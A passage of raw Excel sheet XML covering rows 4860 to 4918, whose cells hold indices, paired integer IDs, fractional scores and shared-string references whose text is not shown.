      </c>
      <c r="G4860" t="s">
        <v>9608</v>
      </c>
      <c r="H4860" t="s">
        <v>9609</v>
      </c>
    </row>
    <row r="4861" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4861" s="1">
        <v>4859</v>
      </c>
      <c r="B4861">
        <v>3288</v>
      </c>
      <c r="C4861">
        <v>3288</v>
      </c>
      <c r="D4861">
        <v>2</v>
      </c>
      <c r="E4861">
        <v>0.99940001964569092</v>
      </c>
      <c r="F4861" t="s">
        <v>5592</v>
      </c>
      <c r="G4861" t="s">
        <v>9610</v>
      </c>
      <c r="H4861" t="s">
        <v>9611</v>
      </c>
    </row>
    <row r="4862" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4862" s="1">
        <v>4860</v>
      </c>
      <c r="B4862">
        <v>3286</v>
      </c>
      <c r="C4862">
        <v>3286</v>
      </c>
      <c r="D4862">
        <v>2</v>
      </c>
      <c r="E4862">
        <v>0.96420001983642578</v>
      </c>
      <c r="F4862" t="s">
        <v>5592</v>
      </c>
      <c r="G4862" t="s">
        <v>9612</v>
      </c>
      <c r="H4862" t="s">
        <v>9613</v>
      </c>
    </row>
    <row r="4863" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4863" s="1">
        <v>4861</v>
      </c>
      <c r="B4863">
        <v>3285</v>
      </c>
      <c r="C4863">
        <v>3285</v>
      </c>
      <c r="D4863">
        <v>2</v>
      </c>
      <c r="E4863">
        <v>0.79439997673034668</v>
      </c>
      <c r="F4863" t="s">
        <v>5592</v>
      </c>
      <c r="G4863" t="s">
        <v>9614</v>
      </c>
      <c r="H4863" t="s">
        <v>9615</v>
      </c>
    </row>
    <row r="4864" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4864" s="1">
        <v>4862</v>
      </c>
      <c r="B4864">
        <v>3284</v>
      </c>
      <c r="C4864">
        <v>3284</v>
      </c>
      <c r="D4864">
        <v>2</v>
      </c>
      <c r="E4864">
        <v>0.98970001935958862</v>
      </c>
      <c r="F4864" t="s">
        <v>5592</v>
      </c>
      <c r="G4864" t="s">
        <v>9616</v>
      </c>
      <c r="H4864" t="s">
        <v>9617</v>
      </c>
    </row>
    <row r="4865" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4865" s="1">
        <v>4863</v>
      </c>
      <c r="B4865">
        <v>3219</v>
      </c>
      <c r="C4865">
        <v>3219</v>
      </c>
      <c r="D4865">
        <v>2</v>
      </c>
      <c r="E4865">
        <v>0.64050000905990601</v>
      </c>
      <c r="F4865" t="s">
        <v>5592</v>
      </c>
      <c r="G4865" t="s">
        <v>9618</v>
      </c>
      <c r="H4865" t="s">
        <v>9619</v>
      </c>
    </row>
    <row r="4866" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4866" s="1">
        <v>4864</v>
      </c>
      <c r="B4866">
        <v>6505</v>
      </c>
      <c r="C4866">
        <v>6505</v>
      </c>
      <c r="D4866">
        <v>2</v>
      </c>
      <c r="E4866">
        <v>0.54229998588562012</v>
      </c>
      <c r="F4866" t="s">
        <v>5592</v>
      </c>
      <c r="G4866" t="s">
        <v>9620</v>
      </c>
      <c r="H4866" t="s">
        <v>9621</v>
      </c>
    </row>
    <row r="4867" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4867" s="1">
        <v>4865</v>
      </c>
      <c r="B4867">
        <v>6503</v>
      </c>
      <c r="C4867">
        <v>6503</v>
      </c>
      <c r="D4867">
        <v>2</v>
      </c>
      <c r="E4867">
        <v>0.70810002088546753</v>
      </c>
      <c r="F4867" t="s">
        <v>5592</v>
      </c>
      <c r="G4867" t="s">
        <v>9622</v>
      </c>
      <c r="H4867" t="s">
        <v>9623</v>
      </c>
    </row>
    <row r="4868" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4868" s="1">
        <v>4866</v>
      </c>
      <c r="B4868">
        <v>6502</v>
      </c>
      <c r="C4868">
        <v>6502</v>
      </c>
      <c r="D4868">
        <v>2</v>
      </c>
      <c r="E4868">
        <v>0.87610000371932983</v>
      </c>
      <c r="F4868" t="s">
        <v>5592</v>
      </c>
      <c r="G4868" t="s">
        <v>9624</v>
      </c>
      <c r="H4868" t="s">
        <v>9625</v>
      </c>
    </row>
    <row r="4869" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4869" s="1">
        <v>4867</v>
      </c>
      <c r="B4869">
        <v>3229</v>
      </c>
      <c r="C4869">
        <v>3229</v>
      </c>
      <c r="D4869">
        <v>2</v>
      </c>
      <c r="E4869">
        <v>0.99210000038146973</v>
      </c>
      <c r="F4869" t="s">
        <v>5592</v>
      </c>
      <c r="G4869" t="s">
        <v>9626</v>
      </c>
      <c r="H4869" t="s">
        <v>9627</v>
      </c>
    </row>
    <row r="4870" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4870" s="1">
        <v>4868</v>
      </c>
      <c r="B4870">
        <v>3243</v>
      </c>
      <c r="C4870">
        <v>3243</v>
      </c>
      <c r="D4870">
        <v>2</v>
      </c>
      <c r="E4870">
        <v>0.77410000562667847</v>
      </c>
      <c r="F4870" t="s">
        <v>5592</v>
      </c>
      <c r="G4870" t="s">
        <v>9628</v>
      </c>
      <c r="H4870" t="s">
        <v>9629</v>
      </c>
    </row>
    <row r="4871" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4871" s="1">
        <v>4869</v>
      </c>
      <c r="B4871">
        <v>3248</v>
      </c>
      <c r="C4871">
        <v>3248</v>
      </c>
      <c r="D4871">
        <v>2</v>
      </c>
      <c r="E4871">
        <v>0.45690000057220459</v>
      </c>
      <c r="F4871" t="s">
        <v>5592</v>
      </c>
      <c r="G4871" t="s">
        <v>9630</v>
      </c>
      <c r="H4871" t="s">
        <v>9631</v>
      </c>
    </row>
    <row r="4872" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4872" s="1">
        <v>4870</v>
      </c>
      <c r="B4872">
        <v>3253</v>
      </c>
      <c r="C4872">
        <v>3253</v>
      </c>
      <c r="D4872">
        <v>2</v>
      </c>
      <c r="E4872">
        <v>0.32159999012947083</v>
      </c>
      <c r="F4872" t="s">
        <v>5592</v>
      </c>
      <c r="G4872" t="s">
        <v>9632</v>
      </c>
      <c r="H4872" t="s">
        <v>9633</v>
      </c>
    </row>
    <row r="4873" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4873" s="1">
        <v>4871</v>
      </c>
      <c r="B4873">
        <v>3254</v>
      </c>
      <c r="C4873">
        <v>3254</v>
      </c>
      <c r="D4873">
        <v>2</v>
      </c>
      <c r="E4873">
        <v>0.46219998598098749</v>
      </c>
      <c r="F4873" t="s">
        <v>5592</v>
      </c>
      <c r="G4873" t="s">
        <v>9634</v>
      </c>
      <c r="H4873" t="s">
        <v>9635</v>
      </c>
    </row>
    <row r="4874" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4874" s="1">
        <v>4872</v>
      </c>
      <c r="B4874">
        <v>6490</v>
      </c>
      <c r="C4874">
        <v>6490</v>
      </c>
      <c r="D4874">
        <v>2</v>
      </c>
      <c r="E4874">
        <v>0.68769997358322144</v>
      </c>
      <c r="F4874" t="s">
        <v>5592</v>
      </c>
      <c r="G4874" t="s">
        <v>9636</v>
      </c>
      <c r="H4874" t="s">
        <v>9637</v>
      </c>
    </row>
    <row r="4875" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4875" s="1">
        <v>4873</v>
      </c>
      <c r="B4875">
        <v>3322</v>
      </c>
      <c r="C4875">
        <v>3322</v>
      </c>
      <c r="D4875">
        <v>2</v>
      </c>
      <c r="E4875">
        <v>0.58399999141693115</v>
      </c>
      <c r="F4875" t="s">
        <v>5592</v>
      </c>
      <c r="G4875" t="s">
        <v>9638</v>
      </c>
      <c r="H4875" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4876" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4876" s="1">
        <v>4874</v>
      </c>
      <c r="B4876">
        <v>3259</v>
      </c>
      <c r="C4876">
        <v>3259</v>
      </c>
      <c r="D4876">
        <v>2</v>
      </c>
      <c r="E4876">
        <v>0.39480000734329218</v>
      </c>
      <c r="F4876" t="s">
        <v>5592</v>
      </c>
      <c r="G4876" t="s">
        <v>9640</v>
      </c>
      <c r="H4876" t="s">
        <v>9641</v>
      </c>
    </row>
    <row r="4877" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4877" s="1">
        <v>4875</v>
      </c>
      <c r="B4877">
        <v>3261</v>
      </c>
      <c r="C4877">
        <v>3261</v>
      </c>
      <c r="D4877">
        <v>2</v>
      </c>
      <c r="E4877">
        <v>0.7718999981880188</v>
      </c>
      <c r="F4877" t="s">
        <v>5592</v>
      </c>
      <c r="G4877" t="s">
        <v>9642</v>
      </c>
      <c r="H4877" t="s">
        <v>9643</v>
      </c>
    </row>
    <row r="4878" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4878" s="1">
        <v>4876</v>
      </c>
      <c r="B4878">
        <v>3262</v>
      </c>
      <c r="C4878">
        <v>3262</v>
      </c>
      <c r="D4878">
        <v>2</v>
      </c>
      <c r="E4878">
        <v>0.84500002861022949</v>
      </c>
      <c r="F4878" t="s">
        <v>5592</v>
      </c>
      <c r="G4878" t="s">
        <v>9644</v>
      </c>
      <c r="H4878" t="s">
        <v>9645</v>
      </c>
    </row>
    <row r="4879" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4879" s="1">
        <v>4877</v>
      </c>
      <c r="B4879">
        <v>3263</v>
      </c>
      <c r="C4879">
        <v>3263</v>
      </c>
      <c r="D4879">
        <v>2</v>
      </c>
      <c r="E4879">
        <v>0.99830001592636108</v>
      </c>
      <c r="F4879" t="s">
        <v>5592</v>
      </c>
      <c r="G4879" t="s">
        <v>9646</v>
      </c>
      <c r="H4879" t="s">
        <v>9647</v>
      </c>
    </row>
    <row r="4880" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4880" s="1">
        <v>4878</v>
      </c>
      <c r="B4880">
        <v>3264</v>
      </c>
      <c r="C4880">
        <v>3264</v>
      </c>
      <c r="D4880">
        <v>2</v>
      </c>
      <c r="E4880">
        <v>0.99919998645782471</v>
      </c>
      <c r="F4880" t="s">
        <v>5592</v>
      </c>
      <c r="G4880" t="s">
        <v>9648</v>
      </c>
      <c r="H4880" t="s">
        <v>9649</v>
      </c>
    </row>
    <row r="4881" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4881" s="1">
        <v>4879</v>
      </c>
      <c r="B4881">
        <v>6489</v>
      </c>
      <c r="C4881">
        <v>6489</v>
      </c>
      <c r="D4881">
        <v>2</v>
      </c>
      <c r="E4881">
        <v>0.97670000791549683</v>
      </c>
      <c r="F4881" t="s">
        <v>5592</v>
      </c>
      <c r="G4881" t="s">
        <v>9650</v>
      </c>
      <c r="H4881" t="s">
        <v>9651</v>
      </c>
    </row>
    <row r="4882" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4882" s="1">
        <v>4880</v>
      </c>
      <c r="B4882">
        <v>3267</v>
      </c>
      <c r="C4882">
        <v>3267</v>
      </c>
      <c r="D4882">
        <v>2</v>
      </c>
      <c r="E4882">
        <v>0.99159997701644897</v>
      </c>
      <c r="F4882" t="s">
        <v>5592</v>
      </c>
      <c r="G4882" t="s">
        <v>9652</v>
      </c>
      <c r="H4882" t="s">
        <v>9653</v>
      </c>
    </row>
    <row r="4883" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4883" s="1">
        <v>4881</v>
      </c>
      <c r="B4883">
        <v>6487</v>
      </c>
      <c r="C4883">
        <v>6487</v>
      </c>
      <c r="D4883">
        <v>2</v>
      </c>
      <c r="E4883">
        <v>0.64099997282028198</v>
      </c>
      <c r="F4883" t="s">
        <v>5592</v>
      </c>
      <c r="G4883" t="s">
        <v>9654</v>
      </c>
      <c r="H4883" t="s">
        <v>9655</v>
      </c>
    </row>
    <row r="4884" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4884" s="1">
        <v>4882</v>
      </c>
      <c r="B4884">
        <v>3277</v>
      </c>
      <c r="C4884">
        <v>3277</v>
      </c>
      <c r="D4884">
        <v>2</v>
      </c>
      <c r="E4884">
        <v>0.55250000953674316</v>
      </c>
      <c r="F4884" t="s">
        <v>5592</v>
      </c>
      <c r="G4884" t="s">
        <v>9656</v>
      </c>
      <c r="H4884" t="s">
        <v>9657</v>
      </c>
    </row>
    <row r="4885" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4885" s="1">
        <v>4883</v>
      </c>
      <c r="B4885">
        <v>3282</v>
      </c>
      <c r="C4885">
        <v>3282</v>
      </c>
      <c r="D4885">
        <v>2</v>
      </c>
      <c r="E4885">
        <v>0.73640000820159912</v>
      </c>
      <c r="F4885" t="s">
        <v>5592</v>
      </c>
      <c r="G4885" t="s">
        <v>9658</v>
      </c>
      <c r="H4885" t="s">
        <v>9659</v>
      </c>
    </row>
    <row r="4886" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4886" s="1">
        <v>4884</v>
      </c>
      <c r="B4886">
        <v>6483</v>
      </c>
      <c r="C4886">
        <v>6483</v>
      </c>
      <c r="D4886">
        <v>2</v>
      </c>
      <c r="E4886">
        <v>0.50249999761581421</v>
      </c>
      <c r="F4886" t="s">
        <v>5592</v>
      </c>
      <c r="G4886" t="s">
        <v>9660</v>
      </c>
      <c r="H4886" t="s">
        <v>9661</v>
      </c>
    </row>
    <row r="4887" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4887" s="1">
        <v>4885</v>
      </c>
      <c r="B4887">
        <v>3260</v>
      </c>
      <c r="C4887">
        <v>3260</v>
      </c>
      <c r="D4887">
        <v>2</v>
      </c>
      <c r="E4887">
        <v>0.99830001592636108</v>
      </c>
      <c r="F4887" t="s">
        <v>5592</v>
      </c>
      <c r="G4887" t="s">
        <v>9662</v>
      </c>
      <c r="H4887" t="s">
        <v>9663</v>
      </c>
    </row>
    <row r="4888" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4888" s="1">
        <v>4886</v>
      </c>
      <c r="B4888">
        <v>2643</v>
      </c>
      <c r="C4888">
        <v>2643</v>
      </c>
      <c r="D4888">
        <v>2</v>
      </c>
      <c r="E4888">
        <v>0.86440002918243408</v>
      </c>
      <c r="F4888" t="s">
        <v>5592</v>
      </c>
      <c r="G4888" t="s">
        <v>9664</v>
      </c>
      <c r="H4888" t="s">
        <v>9665</v>
      </c>
    </row>
    <row r="4889" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4889" s="1">
        <v>4887</v>
      </c>
      <c r="B4889">
        <v>6691</v>
      </c>
      <c r="C4889">
        <v>6691</v>
      </c>
      <c r="D4889">
        <v>2</v>
      </c>
      <c r="E4889">
        <v>0.98089998960494995</v>
      </c>
      <c r="F4889" t="s">
        <v>5592</v>
      </c>
      <c r="G4889" t="s">
        <v>9666</v>
      </c>
      <c r="H4889" t="s">
        <v>6810</v>
      </c>
    </row>
    <row r="4890" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4890" s="1">
        <v>4888</v>
      </c>
      <c r="B4890">
        <v>6863</v>
      </c>
      <c r="C4890">
        <v>6863</v>
      </c>
      <c r="D4890">
        <v>2</v>
      </c>
      <c r="E4890">
        <v>0.63419997692108154</v>
      </c>
      <c r="F4890" t="s">
        <v>5592</v>
      </c>
      <c r="G4890" t="s">
        <v>9667</v>
      </c>
      <c r="H4890" t="s">
        <v>9668</v>
      </c>
    </row>
    <row r="4891" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4891" s="1">
        <v>4889</v>
      </c>
      <c r="B4891">
        <v>2200</v>
      </c>
      <c r="C4891">
        <v>2200</v>
      </c>
      <c r="D4891">
        <v>2</v>
      </c>
      <c r="E4891">
        <v>0.6721000075340271</v>
      </c>
      <c r="F4891" t="s">
        <v>5592</v>
      </c>
      <c r="G4891" t="s">
        <v>9669</v>
      </c>
      <c r="H4891" t="s">
        <v>9670</v>
      </c>
    </row>
    <row r="4892" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4892" s="1">
        <v>4890</v>
      </c>
      <c r="B4892">
        <v>6848</v>
      </c>
      <c r="C4892">
        <v>6848</v>
      </c>
      <c r="D4892">
        <v>2</v>
      </c>
      <c r="E4892">
        <v>0.41269999742507929</v>
      </c>
      <c r="F4892" t="s">
        <v>5592</v>
      </c>
      <c r="G4892" t="s">
        <v>9671</v>
      </c>
      <c r="H4892" t="s">
        <v>9672</v>
      </c>
    </row>
    <row r="4893" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4893" s="1">
        <v>4891</v>
      </c>
      <c r="B4893">
        <v>2197</v>
      </c>
      <c r="C4893">
        <v>2197</v>
      </c>
      <c r="D4893">
        <v>2</v>
      </c>
      <c r="E4893">
        <v>0.60710000991821289</v>
      </c>
      <c r="F4893" t="s">
        <v>5592</v>
      </c>
      <c r="G4893" t="s">
        <v>9673</v>
      </c>
      <c r="H4893" t="s">
        <v>9674</v>
      </c>
    </row>
    <row r="4894" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4894" s="1">
        <v>4892</v>
      </c>
      <c r="B4894">
        <v>6938</v>
      </c>
      <c r="C4894">
        <v>6938</v>
      </c>
      <c r="D4894">
        <v>2</v>
      </c>
      <c r="E4894">
        <v>0.67839998006820679</v>
      </c>
      <c r="F4894" t="s">
        <v>5592</v>
      </c>
      <c r="G4894" t="s">
        <v>9675</v>
      </c>
      <c r="H4894" t="s">
        <v>9676</v>
      </c>
    </row>
    <row r="4895" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4895" s="1">
        <v>4893</v>
      </c>
      <c r="B4895">
        <v>6940</v>
      </c>
      <c r="C4895">
        <v>6940</v>
      </c>
      <c r="D4895">
        <v>2</v>
      </c>
      <c r="E4895">
        <v>0.62580001354217529</v>
      </c>
      <c r="F4895" t="s">
        <v>5592</v>
      </c>
      <c r="G4895" t="s">
        <v>9677</v>
      </c>
      <c r="H4895" t="s">
        <v>9678</v>
      </c>
    </row>
    <row r="4896" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4896" s="1">
        <v>4894</v>
      </c>
      <c r="B4896">
        <v>6842</v>
      </c>
      <c r="C4896">
        <v>6842</v>
      </c>
      <c r="D4896">
        <v>2</v>
      </c>
      <c r="E4896">
        <v>0.98400002717971802</v>
      </c>
      <c r="F4896" t="s">
        <v>5592</v>
      </c>
      <c r="G4896" t="s">
        <v>9679</v>
      </c>
      <c r="H4896" t="s">
        <v>9680</v>
      </c>
    </row>
    <row r="4897" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4897" s="1">
        <v>4895</v>
      </c>
      <c r="B4897">
        <v>2415</v>
      </c>
      <c r="C4897">
        <v>2415</v>
      </c>
      <c r="D4897">
        <v>2</v>
      </c>
      <c r="E4897">
        <v>0.93629997968673706</v>
      </c>
      <c r="F4897" t="s">
        <v>5592</v>
      </c>
      <c r="G4897" t="s">
        <v>9681</v>
      </c>
      <c r="H4897" t="s">
        <v>9682</v>
      </c>
    </row>
    <row r="4898" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4898" s="1">
        <v>4896</v>
      </c>
      <c r="B4898">
        <v>6941</v>
      </c>
      <c r="C4898">
        <v>6941</v>
      </c>
      <c r="D4898">
        <v>2</v>
      </c>
      <c r="E4898">
        <v>0.9846000075340271</v>
      </c>
      <c r="F4898" t="s">
        <v>5592</v>
      </c>
      <c r="G4898" t="s">
        <v>9683</v>
      </c>
      <c r="H4898" t="s">
        <v>9684</v>
      </c>
    </row>
    <row r="4899" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4899" s="1">
        <v>4897</v>
      </c>
      <c r="B4899">
        <v>2191</v>
      </c>
      <c r="C4899">
        <v>2191</v>
      </c>
      <c r="D4899">
        <v>2</v>
      </c>
      <c r="E4899">
        <v>0.99290001392364502</v>
      </c>
      <c r="F4899" t="s">
        <v>5592</v>
      </c>
      <c r="G4899" t="s">
        <v>9685</v>
      </c>
      <c r="H4899" t="s">
        <v>9686</v>
      </c>
    </row>
    <row r="4900" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4900" s="1">
        <v>4898</v>
      </c>
      <c r="B4900">
        <v>2190</v>
      </c>
      <c r="C4900">
        <v>2190</v>
      </c>
      <c r="D4900">
        <v>2</v>
      </c>
      <c r="E4900">
        <v>0.90359997749328613</v>
      </c>
      <c r="F4900" t="s">
        <v>5592</v>
      </c>
      <c r="G4900" t="s">
        <v>9687</v>
      </c>
      <c r="H4900" t="s">
        <v>9688</v>
      </c>
    </row>
    <row r="4901" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4901" s="1">
        <v>4899</v>
      </c>
      <c r="B4901">
        <v>2420</v>
      </c>
      <c r="C4901">
        <v>2420</v>
      </c>
      <c r="D4901">
        <v>2</v>
      </c>
      <c r="E4901">
        <v>0.99889999628067017</v>
      </c>
      <c r="F4901" t="s">
        <v>5592</v>
      </c>
      <c r="G4901" t="s">
        <v>9689</v>
      </c>
      <c r="H4901" t="s">
        <v>9690</v>
      </c>
    </row>
    <row r="4902" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4902" s="1">
        <v>4900</v>
      </c>
      <c r="B4902">
        <v>2426</v>
      </c>
      <c r="C4902">
        <v>2426</v>
      </c>
      <c r="D4902">
        <v>2</v>
      </c>
      <c r="E4902">
        <v>0.9968000054359436</v>
      </c>
      <c r="F4902" t="s">
        <v>5592</v>
      </c>
      <c r="G4902" t="s">
        <v>9691</v>
      </c>
      <c r="H4902" t="s">
        <v>9692</v>
      </c>
    </row>
    <row r="4903" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4903" s="1">
        <v>4901</v>
      </c>
      <c r="B4903">
        <v>6942</v>
      </c>
      <c r="C4903">
        <v>6942</v>
      </c>
      <c r="D4903">
        <v>2</v>
      </c>
      <c r="E4903">
        <v>0.99970000982284546</v>
      </c>
      <c r="F4903" t="s">
        <v>5592</v>
      </c>
      <c r="G4903" t="s">
        <v>9693</v>
      </c>
      <c r="H4903" t="s">
        <v>9694</v>
      </c>
    </row>
    <row r="4904" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4904" s="1">
        <v>4902</v>
      </c>
      <c r="B4904">
        <v>2427</v>
      </c>
      <c r="C4904">
        <v>2427</v>
      </c>
      <c r="D4904">
        <v>2</v>
      </c>
      <c r="E4904">
        <v>0.50669997930526733</v>
      </c>
      <c r="F4904" t="s">
        <v>5592</v>
      </c>
      <c r="G4904" t="s">
        <v>9695</v>
      </c>
      <c r="H4904" t="s">
        <v>9696</v>
      </c>
    </row>
    <row r="4905" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4905" s="1">
        <v>4903</v>
      </c>
      <c r="B4905">
        <v>2431</v>
      </c>
      <c r="C4905">
        <v>2431</v>
      </c>
      <c r="D4905">
        <v>2</v>
      </c>
      <c r="E4905">
        <v>0.85350000858306885</v>
      </c>
      <c r="F4905" t="s">
        <v>5592</v>
      </c>
      <c r="G4905" t="s">
        <v>9697</v>
      </c>
      <c r="H4905" t="s">
        <v>9698</v>
      </c>
    </row>
    <row r="4906" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4906" s="1">
        <v>4904</v>
      </c>
      <c r="B4906">
        <v>2407</v>
      </c>
      <c r="C4906">
        <v>2407</v>
      </c>
      <c r="D4906">
        <v>2</v>
      </c>
      <c r="E4906">
        <v>0.95069998502731323</v>
      </c>
      <c r="F4906" t="s">
        <v>5592</v>
      </c>
      <c r="G4906" t="s">
        <v>9699</v>
      </c>
      <c r="H4906" t="s">
        <v>9700</v>
      </c>
    </row>
    <row r="4907" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4907" s="1">
        <v>4905</v>
      </c>
      <c r="B4907">
        <v>2434</v>
      </c>
      <c r="C4907">
        <v>2434</v>
      </c>
      <c r="D4907">
        <v>2</v>
      </c>
      <c r="E4907">
        <v>0.44229999184608459</v>
      </c>
      <c r="F4907" t="s">
        <v>5592</v>
      </c>
      <c r="G4907" t="s">
        <v>9701</v>
      </c>
      <c r="H4907" t="s">
        <v>9117</v>
      </c>
    </row>
    <row r="4908" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4908" s="1">
        <v>4906</v>
      </c>
      <c r="B4908">
        <v>2202</v>
      </c>
      <c r="C4908">
        <v>2202</v>
      </c>
      <c r="D4908">
        <v>2</v>
      </c>
      <c r="E4908">
        <v>0.70429998636245728</v>
      </c>
      <c r="F4908" t="s">
        <v>5592</v>
      </c>
      <c r="G4908" t="s">
        <v>9702</v>
      </c>
      <c r="H4908" t="s">
        <v>9703</v>
      </c>
    </row>
    <row r="4909" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4909" s="1">
        <v>4907</v>
      </c>
      <c r="B4909">
        <v>2206</v>
      </c>
      <c r="C4909">
        <v>2206</v>
      </c>
      <c r="D4909">
        <v>2</v>
      </c>
      <c r="E4909">
        <v>0.87620002031326294</v>
      </c>
      <c r="F4909" t="s">
        <v>5592</v>
      </c>
      <c r="G4909" t="s">
        <v>9704</v>
      </c>
      <c r="H4909" t="s">
        <v>9705</v>
      </c>
    </row>
    <row r="4910" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4910" s="1">
        <v>4908</v>
      </c>
      <c r="B4910">
        <v>2392</v>
      </c>
      <c r="C4910">
        <v>2392</v>
      </c>
      <c r="D4910">
        <v>2</v>
      </c>
      <c r="E4910">
        <v>0.80159997940063477</v>
      </c>
      <c r="F4910" t="s">
        <v>5592</v>
      </c>
      <c r="G4910" t="s">
        <v>9706</v>
      </c>
      <c r="H4910" t="s">
        <v>9707</v>
      </c>
    </row>
    <row r="4911" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4911" s="1">
        <v>4909</v>
      </c>
      <c r="B4911">
        <v>2393</v>
      </c>
      <c r="C4911">
        <v>2393</v>
      </c>
      <c r="D4911">
        <v>2</v>
      </c>
      <c r="E4911">
        <v>0.98189997673034668</v>
      </c>
      <c r="F4911" t="s">
        <v>5592</v>
      </c>
      <c r="G4911" t="s">
        <v>9708</v>
      </c>
      <c r="H4911" t="s">
        <v>9709</v>
      </c>
    </row>
    <row r="4912" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4912" s="1">
        <v>4910</v>
      </c>
      <c r="B4912">
        <v>2219</v>
      </c>
      <c r="C4912">
        <v>2219</v>
      </c>
      <c r="D4912">
        <v>2</v>
      </c>
      <c r="E4912">
        <v>0.99599999189376831</v>
      </c>
      <c r="F4912" t="s">
        <v>5592</v>
      </c>
      <c r="G4912" t="s">
        <v>9710</v>
      </c>
      <c r="H4912" t="s">
        <v>9711</v>
      </c>
    </row>
    <row r="4913" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4913" s="1">
        <v>4911</v>
      </c>
      <c r="B4913">
        <v>2394</v>
      </c>
      <c r="C4913">
        <v>2394</v>
      </c>
      <c r="D4913">
        <v>2</v>
      </c>
      <c r="E4913">
        <v>0.55400002002716064</v>
      </c>
      <c r="F4913" t="s">
        <v>5592</v>
      </c>
      <c r="G4913" t="s">
        <v>9712</v>
      </c>
      <c r="H4913" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="4914" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4914" s="1">
        <v>4912</v>
      </c>
      <c r="B4914">
        <v>6929</v>
      </c>
      <c r="C4914">
        <v>6929</v>
      </c>
      <c r="D4914">
        <v>2</v>
      </c>
      <c r="E4914">
        <v>0.99779999256134033</v>
      </c>
      <c r="F4914" t="s">
        <v>5592</v>
      </c>
      <c r="G4914" t="s">
        <v>9714</v>
      </c>
      <c r="H4914" t="s">
        <v>9715</v>
      </c>
    </row>
    <row r="4915" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4915" s="1">
        <v>4913</v>
      </c>
      <c r="B4915">
        <v>6850</v>
      </c>
      <c r="C4915">
        <v>6850</v>
      </c>
      <c r="D4915">
        <v>2</v>
      </c>
      <c r="E4915">
        <v>0.63819998502731323</v>
      </c>
      <c r="F4915" t="s">
        <v>5592</v>
      </c>
      <c r="G4915" t="s">
        <v>9716</v>
      </c>
      <c r="H4915" t="s">
        <v>9717</v>
      </c>
    </row>
    <row r="4916" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4916" s="1">
        <v>4914</v>
      </c>
      <c r="B4916">
        <v>2400</v>
      </c>
      <c r="C4916">
        <v>2400</v>
      </c>
      <c r="D4916">
        <v>2</v>
      </c>
      <c r="E4916">
        <v>0.94150000810623169</v>
      </c>
      <c r="F4916" t="s">
        <v>5592</v>
      </c>
      <c r="G4916" t="s">
        <v>9718</v>
      </c>
      <c r="H4916" t="s">
        <v>9719</v>
      </c>
    </row>
    <row r="4917" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4917" s="1">
        <v>4915</v>
      </c>
      <c r="B4917">
        <v>2403</v>
      </c>
      <c r="C4917">
        <v>2403</v>
      </c>
      <c r="D4917">
        <v>2</v>
      </c>
      <c r="E4917">
        <v>0.75859999656677246</v>
      </c>
      <c r="F4917" t="s">
        <v>5592</v>
      </c>
      <c r="G4917" t="s">
        <v>9720</v>
      </c>
      <c r="H4917" t="s">
        <v>9721</v>
      </c>
    </row>
    <row r="4918" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4918" s="1">
        <v>4916</v>
      </c>
      <c r="B4918">
        <v>2404</v>
      </c>
      <c r="C4918">
        <v>2404</v>
      </c>
      <c r="D4918">
        <v>2</v>
      </c>
      <c r="E4918">
        <v>0.50590002536773682</v>
      </c>
      <c r="F4918" t="s">
        <v>5592</v>
      </c>
      <c r="G4918" t="s">
        <v>9722</v>
      </c>
      <c r="H4918" t="s">
        <v>9723</v>
      </c>
    </row>
